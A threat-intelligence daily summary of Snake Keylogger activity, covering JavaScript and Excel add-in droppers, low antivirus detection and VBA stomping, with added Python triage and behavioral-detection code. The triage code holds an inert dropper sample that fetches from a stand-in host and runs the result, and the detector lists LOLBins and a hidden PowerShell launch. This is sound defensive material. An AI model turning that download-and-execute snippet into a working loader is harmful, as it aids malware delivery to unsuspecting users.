Daily Summary
Snake Keylogger activity surged today: 4 new samples were detected, a 75% increase over the 7-day average of about 2 per day and the highest single-day count this week. The jump is accompanied by a shift in distribution tactics.
New Samples Detected
Three of the four samples are JavaScript (.js) droppers; the fourth is an Excel add-in (.xlam). The .js files use obfuscated variable names and instantiate WScript.Shell under Windows Script Host to download the payload from a remote server and execute it. The .xlam file carries VBA macros with an auto-open trigger, a departure from the PDF-based delivery seen last month. File names are generic business-correspondence lures such as "invoice_22.js" and "report_22.xlam".
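As an added illustration of how a sandbox or mail-gateway analyst would triage these attachments statically (example code written for this summary, not taken from the original report or any vendor tool): the script scores a .js file on the indicators named above. The two sample scripts, the example.invalid URL and the scoring weights are constructed for this example; the "dropper" sample is an inert stand-in, not a real Snake Keylogger file.

```python
"""Static triage of .js email attachments for the dropper pattern described above.

Added example; not code from the original report. It scores a script on the
indicators the report names: WScript.Shell use, download/execute APIs,
obfuscated identifiers, and a generic business-lure filename. Both sample
scripts below are constructed for this example and are inert (the URL is in
the reserved .invalid TLD); they are not real Snake Keylogger samples.
"""
import re

# COM objects a Windows Script Host dropper uses to fetch, write and run a payload.
DROPPER_API = {
    "wsh_shell":   re.compile(r"WScript\.Shell", re.I),
    "http_client": re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "file_write":  re.compile(r"ADODB\.Stream|Scripting\.FileSystemObject", re.I),
    "exec":        re.compile(r"\.(?:Run|Exec|ShellExecute)\s*\(", re.I),
    "activex":     re.compile(r"ActiveXObject\s*\(", re.I),
}
WEIGHTS = {"wsh_shell": 2, "exec": 2, "http_client": 1, "file_write": 1, "activex": 1}  # assumed weights
# invoice_22.js / report_22.xlam style lures the report mentions.
GENERIC_NAME = re.compile(
    r"^(?:invoice|report|payment|receipt|order|shipping)[_-]?\d*\.(?:js|jse|xlam|xlsm)$", re.I)
DECLARED = re.compile(r"\b(?:var|let|const|function)\s+([A-Za-z_$][\w$]*)")
# Obfuscators emit _0x1a2b-style or one/two-letter identifiers.
OBFUSCATED_NAME = re.compile(r"^(?:_0x[0-9a-f]+|[A-Za-z_$]{1,2})$", re.I)


def triage_js(filename, src):
    """Return indicator hits, an obfuscation ratio, a score and a verdict for one script."""
    hits = sorted(name for name, rx in DROPPER_API.items() if rx.search(src))
    names = DECLARED.findall(src)
    obf_ratio = sum(1 for n in names if OBFUSCATED_NAME.match(n)) / len(names) if names else 0.0
    generic = bool(GENERIC_NAME.match(filename))
    score = sum(WEIGHTS[h] for h in hits)
    score += 2 if len(names) >= 3 and obf_ratio >= 0.5 else 0
    score += 1 if generic else 0
    verdict = "likely dropper" if score >= 5 else "review" if score >= 3 else "benign-looking"
    return {"file": filename, "api_hits": hits, "obfuscated_identifier_ratio": round(obf_ratio, 2),
            "generic_name": generic, "score": score, "verdict": verdict}


# Constructed, inert stand-in for the obfuscated download-and-execute droppers.
DROPPER_SAMPLE = r'''
var _0x2c1a = ["WScript.Shell", "MSXML2.XMLHTTP", "GET", "http://example.invalid/upd"];
var a = new ActiveXObject(_0x2c1a[0]);
var b = new ActiveXObject(_0x2c1a[1]);
b.open(_0x2c1a[2], _0x2c1a[3], false);
b.send();
var c = new ActiveXObject("ADODB.Stream");
a.Run("%TEMP%\\upd.exe", 0, false);
'''

# Constructed benign Node.js build helper for comparison.
BENIGN_SAMPLE = r'''
const fs = require("fs");
function readVersion(path) {
  const manifest = JSON.parse(fs.readFileSync(path, "utf8"));
  return manifest.version;
}
console.log(readVersion("package.json"));
'''

if __name__ == "__main__":
    for name, src in (("invoice_22.js", DROPPER_SAMPLE), ("build.js", BENIGN_SAMPLE)):
        print(triage_js(name, src))
```

The identifier heuristic deliberately requires several declarations before it counts, so a short benign script with one `fs` variable is not penalised; the API hits carry most of the weight because a legitimate .js attachment almost never needs WScript.Shell plus an HTTP client.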
Distribution Methods
The .js samples point to email-attachment campaigns that rely on users double-clicking a script disguised as a document (Windows hands .js files to Windows Script Host by default, so a double-click runs them). The .xlam file indicates a pivot toward macro-enabled Office attachments, most likely delivered by phishing emails with subject lines about urgent payments or shipping updates. No exploit-kit or malvertising activity was observed today.
Detection Rate
Of the four samples submitted to VirusTotal, detection rates were low: the .js files scored 5-7 detections out of roughly 60 engines, and the .xlam file only 3. The custom packing layers and string obfuscation in the JavaScript variants are likely defeating signature-based detection. SOC teams should not rely on AV verdicts for these files and should supplement them with behavioral detections built on process lineage and network activity from the script host.
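The behavioral detection suggested above, as an added example written for this summary (not the report's own rules or any product's logic): it walks constructed process-create and network-connect events shaped like Sysmon EventID 1 and 3 records and flags the chain explorer.exe -> wscript.exe on a script in an attachment directory -> outbound connection -> dropped child, plus Excel spawning a LOLBin, which is what an auto-open macro looks like from the endpoint. All paths, PIDs, the user name and the 203.0.113.45 address (a documentation-range IP) are invented for the example.

```python
"""Behavioral detection for the WSH-dropper and macro-launch chains in this report.

Added example, not from the report. Events are constructed dicts shaped like
Sysmon process-create (EventID 1) and network-connect (EventID 3) records;
paths, PIDs, user and the 203.0.113.45 address are invented for illustration.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Where mail clients and browsers drop attachments; a script run from here was double-clicked.
ATTACHMENT_DIRS = ("\\content.outlook\\", "\\downloads\\", "\\appdata\\local\\temp\\")
SCRIPT_EXT = re.compile(r"\.(?:js|jse|vbs|wsf)\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def user_writable(path):
    return path.lower().startswith("c:\\users\\")


def detect(events):
    """Return one alert per suspicious process, listing every reason that fired for it."""
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    findings = {}  # pid -> [reason, ...]; insertion order = first time the pid was flagged

    def flag(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for e in events:
        image = basename(e["Image"])
        if e["EventID"] == 1:
            cmd = e["CommandLine"]
            parent = basename(e["ParentImage"])
            # Script host started on a script sitting in an attachment/download directory.
            if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and any(d in cmd.lower() for d in ATTACHMENT_DIRS):
                flag(e["ProcessId"], "script host ran a script from an attachment/download path")
            # Script host handing off to a dropped binary or a LOLBin: the "execute" half.
            if parent in SCRIPT_HOSTS and (user_writable(e["Image"]) or image in LOLBINS):
                flag(e["ParentProcessId"], f"script host spawned {image}")
            # Office spawning a LOLBin or a user-writable binary is the macro running.
            if parent in OFFICE_APPS and (user_writable(e["Image"]) or image in LOLBINS):
                flag(e["ParentProcessId"], f"office app spawned {image}")
        elif e["EventID"] == 3 and image in SCRIPT_HOSTS:
            # The "download" half: wscript.exe itself talking to the network.
            flag(e["ProcessId"], f"script host connected to {e['DestinationIp']}:{e['DestinationPort']}")

    alerts = []
    for pid, reasons in findings.items():
        p = procs.get(pid, {})
        alerts.append({
            "pid": pid, "image": basename(p.get("Image", "")), "user": p.get("User"),
            "severity": "high" if len(reasons) >= 2 else "medium", "reasons": reasons,
        })
    return alerts


# Constructed events: one full dropper chain, one macro launch, and two benign look-alikes.
OUTLOOK_CACHE = r"C:\Users\jdoe\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\7K2Q9X1A"
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
EVENTS = [
    {"EventID": 1, "ProcessId": 4412, "ParentProcessId": 1880, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"C:\\Windows\\System32\\wscript.exe" "{OUTLOOK_CACHE}\\invoice_22.js"'},
    {"EventID": 3, "ProcessId": 4412, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "203.0.113.45", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 4480, "ParentProcessId": 4412, "User": "CORP\\jdoe",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\upd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Users\jdoe\AppData\Local\Temp\upd.exe"'},
    {"EventID": 1, "ProcessId": 5120, "ParentProcessId": 1880, "User": "CORP\\jdoe",
     "Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{EXCEL}" "C:\\Users\\jdoe\\Downloads\\report_22.xlam"'},
    {"EventID": 1, "ProcessId": 5208, "ParentProcessId": 5120, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": EXCEL,
     "CommandLine": r"powershell.exe -w hidden -File C:\Users\jdoe\AppData\Local\Temp\s.ps1"},
    # Benign: a domain logon script, and a plain workbook that spawns nothing.
    {"EventID": 1, "ProcessId": 6000, "ParentProcessId": 1880, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe \\corp.example\netlogon\mapdrives.vbs"},
    {"EventID": 1, "ProcessId": 6100, "ParentProcessId": 1880, "User": "CORP\\jdoe",
     "Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{EXCEL}" "C:\\Users\\jdoe\\Documents\\budget.xlsx"'},
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The wscript.exe chain scores high because three independent stages fire on one process; the Excel launch is medium on a single indicator, which is the right starting severity given how often Office legitimately spawns helpers. The logon script from the netlogon share is not flagged because the attachment-directory condition is part of the first rule, not a bare "wscript.exe ran a .vbs" match.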
C2 Infrastructure
No new C2 servers were identified today. Active servers remain concentrated in Russia and the Netherlands; the implant checks in with HTTP POST requests carrying encrypted payloads over TLS on port 443. No change in TLS certificate patterns was observed.
7-Day Trend
Activity is ramping up after a mid-week lull: today's 4 samples double the previous weekly high of 2 on April 18. The 75% increase over the 7-day average suggests campaign operators are testing new delivery vectors.
Security Analysis
The coexistence of .js and .xlam samples on the same day is notable, since Snake Keylogger campaigns have traditionally favored a single file type. Running both may indicate operators A/B-testing distribution methods or targeting different verticals in parallel. The .xlam variant's low detection rate is concerning: it uses VBA stomping (the macro's source code is removed or replaced while the compiled p-code that Office actually executes is retained), which defeats tools that inspect only the VBA source. Defenders should block .js and .jse attachments at the mail gateway, change the default handler for those extensions from Windows Script Host to a text editor so that a double-click cannot execute them, and keep macros from untrusted sources (files carrying the Mark of the Web) blocked in Office.